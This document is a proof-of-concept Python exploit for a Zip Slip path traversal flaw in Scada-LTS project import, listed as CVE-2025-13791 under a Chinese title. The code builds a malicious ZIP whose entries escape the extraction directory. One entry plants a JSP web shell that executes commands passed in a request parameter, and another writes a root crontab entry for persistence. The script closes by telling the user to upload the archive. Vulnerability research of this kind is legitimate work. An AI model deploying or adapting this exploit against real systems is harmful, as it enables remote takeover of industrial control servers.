CVE-2025-13791 Scada-LTS ZIPProjectManager路径遍历漏洞

import zipfile import os import sys def create_zip_slip_poc(): """ Generate a PoC ZIP file for CVE-2025-13791 - Scada-LTS Zip Slip vulnerability This PoC demonstrates how a malicious ZIP file can be crafted to write files outside the intended extraction directory using path traversal sequences. """ output_file = "scada_lts_zipslip_poc.zip" # Create a malicious ZIP file with path traversal in filename with zipfile.ZipFile(output_file, 'w', zipfile.ZIP_DEFLATED) as zipf: # Normal file (will be extracted to intended directory) zipf.writestr("project/config.xml", "<config>normal</config>") # Malicious file with path traversal - writes to parent directory # Change ../../../ to target desired system location malicious_path = "../../../tmp/scada_lts_poc.txt" zipf.writestr(malicious_path, "CVE-2025-13791 PoC - Path Traversal Successful!") # Example: Overwrite web shell zipf.writestr("../../../webapps/ROOT/shell.jsp", "<%@ page import=\"java.io.*\" %><% Process p=Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>") # Example: Add to crontab for persistence zipf.writestr("../../../var/spool/cron/root", "* * * * * /tmp/malicious.sh") print(f"[+] PoC ZIP file created: {output_file}") print(f"[+] Files in archive:") with zipfile.ZipFile(output_file, 'r') as zipf: for info in zipf.infolist(): print(f" - {info.filename}") print("\n[!] Upload this ZIP file through Scada-LTS Project Import functionality") print("[!] The path traversal files will be written outside the intended directory") if __name__ == "__main__": create_zip_slip_poc()